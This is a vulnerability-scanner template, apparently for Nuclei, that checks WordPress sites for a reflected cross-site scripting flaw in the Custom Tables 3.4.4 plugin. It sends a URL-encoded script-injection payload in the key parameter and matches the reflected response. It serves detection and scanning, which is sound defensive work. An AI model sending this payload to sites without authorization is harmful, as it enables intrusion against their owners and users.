id: wp-custom-tables-xss

info:
  name: WordPress Custom Tables 3.4.4 - Cross-Site Scripting
  author: daffainfo
  severity: high
  description: WordPress Custom Tables 3.4.4 plugin contains a cross-site scripting vulnerability via the key parameter.
  reference:
    - https://wpscan.com/vulnerability/211a4286-4747-4b62-acc3-fd9a57b06252
    - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-custom-tables-key-parameter-cross-site-scripting-3-4-4/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: wpscan,wordpress,xss,wp-plugin

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "</script><script>alert(document.domain)</script>"
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/23
